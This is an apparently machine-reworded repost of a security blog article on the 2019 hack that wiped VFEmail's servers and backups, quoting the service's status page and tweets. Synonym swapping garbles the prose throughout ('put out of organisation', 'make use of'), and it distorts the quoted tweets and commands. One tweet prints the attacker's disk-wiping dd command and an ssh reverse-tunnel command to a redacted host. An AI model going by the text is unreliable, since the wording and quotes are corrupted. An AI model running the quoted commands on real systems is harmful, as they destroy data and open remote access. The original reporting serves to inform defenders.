An e-mail service called VFEmail was basically put out of organisation after a hack meant to erase whatever in (and out of) sight.

““ Yes, @VFEmail is successfully gone. It will likely not return. I never ever believed anybody would appreciate my labor of love a lot that they’’d wish to entirely and completely damage it.””


This wasn ’ t” “ simply ” a basic website compromise , or some sort of database dump. It was something completely rather even worse. In other words, the overall annihilation of a service and most, if not all, of its facilities.

. What occurred?

Users of VFEmail woke to the following message on the service ’ s site:


 VFEmail message


Click to increase the size of


!!! ALERT!!!! Update Feb 11 2019


vfemail( dot) internet and mail( dot) vfemail( dot) internet are presently not available.

We have actually suffered devastating damage at the hands of a hacker, last viewed as aktv [redacted]

This individual has actually ruined all information in the United States, both backup and main systems. We are working to recuperate what information we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being provided.

Webmail is up. Note-mailboxes are developed upon brand-new mail shipment. You might not have actually gotten mail if you can not login.

Mailboxes are brand-new, no subfolders exist.

No filters remain in location. If you produced a filter with Horde, Login to Horde, Create any folders you require.

Click Filter, Click Script, then click ‘‘ Activate Script ’.


There is no spam scanning at this time –– Incoming mail might be Spam scanned depending upon DNS status.

Free users need to not try to send out e-mail, there is presently no shipment system totally free accounts. Paid accounts must be useable, consisting of Horde/Roundcube calendars and contacts.

At this time I am not sure of the status of existing mail for United States users. DO NOT TRY TO MAKE IT WORK if you have your own e-mail customer.

If you reconnect your customer to your brand-new mail box, all your regional mail will be lost.


.Did they put word out on social networks?

You wager they did, and the Tweets put on’’ t produce enjoyable reading:

This is not looking great. All externally dealing with systems, of varying OS’s and remote authentication, in several information centers are down.

—– VFEmail.net (@VFEmail) February 11, 2019

Caught the perp in the middle of formatting the backup server: dd if=/ dev/zero of=/ dev/da0 bs= 4194304 look for= 1024 count= 399559via: ssh -v -oStrictHostKeyChecking= no -oLogLevel= mistake -oUserKnownHostsFile=/ dev/null aktv@ -R -N

—– VFEmail.net (@VFEmail) February 11, 2019

It might sound a bit interesting to stroll in on the scene of the criminal activity, however I can guarantee you it’’d just include great deals of ““ oh no ” kinds of expression. If they’’ re currently cleaning your backups, the video game is undoubtedly over.

.Did they recuperate?

Sadly things didn’’ t enhance, and a couple of hours later on the complete damage report was readily available:

At this time, the assaulter has actually formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a significantly smaller sized dataset. NL backups by the provideer were undamaged, and service ought to be up there.

—– VFEmail.net (@VFEmail) February 11, 2019

All information was secured a minimum of, however stated information essentially disappeared into thin air when it was scrubbed:

Yep, however it does not matter. They simply formatted whatever.

—– VFEmail.net (@VFEmail) February 11, 2019

They likewise handled to ruin different VMs utilizing various types of authentication.

Strangely, not all VMs shared the very same authentication, however all were ruined. This was more than a multi-password through ssh make use of, and there was no ransom. Simply attack and damage.

—– VFEmail.net (@VFEmail) February 11, 2019

.““ Just attack and ruin””.

Services and websites have actually been assaulted badly in the past, some to the point of damage. There’’ s nearly constantly an obvious factor offered, or a ransom, or some other idea.

Here, it’’ s absolutely nothing however total destruction and a service around considering that 2001 definitely destroyed in the deal. There’’ s no sign regarding how they got in, or if a crucial system had no multi-factor authentication. A variety of analysts have actually recommended this defect might have been a method for the opponent.

Until in-depth analysis is released, it’’ s hard to state why this took place. Did the owner of the service intensify a skilled hacker? Or could among the service users have drawn attention from undesirable sources, and this is completion outcome? It’’ ll be interesting to discover. If you run a comparable service, you might want to think about a good offline backup system in the meantime.

The post Hacker damages VFEmail service, cleans backups appeared initially on Malwarebytes Labs .


Read more: blog.malwarebytes.com